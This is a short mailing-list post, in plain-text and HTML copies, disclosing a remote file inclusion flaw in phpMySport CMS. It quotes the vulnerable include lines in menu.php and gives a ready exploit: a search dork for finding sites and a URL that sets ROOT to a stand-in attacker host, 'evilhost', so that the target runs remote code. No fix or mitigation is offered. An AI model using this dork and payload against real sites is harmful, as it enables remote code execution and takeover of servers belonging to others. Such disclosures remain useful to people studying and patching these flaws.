------=_Part_13450_9048419.1173540747323
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

Application : phpMySport CMS

URL : http://phpmysport.sourceforge.net/en/

Variable menu.php

include_once(ROOT."/team/sql_team.php");
include_once(ROOT."/team/tpl_team.php");
include_once(ROOT."/team/lg_team_".LANG.".php");
include(ROOT."/team/team_list.php");


Exploit:
~~~~~~~~

dork: "phpMySport"

http://www.vuln.com/path/menu.php?ROOT=http://evilhost


vitux

#vitux.manis@gmail.com

------=_Part_13450_9048419.1173540747323
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

Application : phpMySport CMS<br><br>URL : <a href="http://phpmysport.sourceforge.net/en/">http://phpmysport.sourceforge.net/en/</a><br><br>Variable menu.php<br><br>include_once(ROOT.&quot;/team/sql_team.php&quot;);<br>include_once(ROOT.&quot;/team/tpl_team.php&quot;);
<br>include_once(ROOT.&quot;/team/lg_team_&quot;.LANG.&quot;.php&quot;);<br>include(ROOT.&quot;/team/team_list.php&quot;);<br><br>&nbsp;<br>Exploit:<br>~~~~~~~~<br><br>dork: &quot;phpMySport&quot;<br><br><a href="http://www.vuln.com/path/menu.php?ROOT=http://evilhost">
http://www.vuln.com/path/menu.php?ROOT=http://evilhost</a><br><br><br>vitux<br>&nbsp;<br>#vitux.manis@<a href="http://gmail.com">gmail.com</a>

------=_Part_13450_9048419.1173540747323--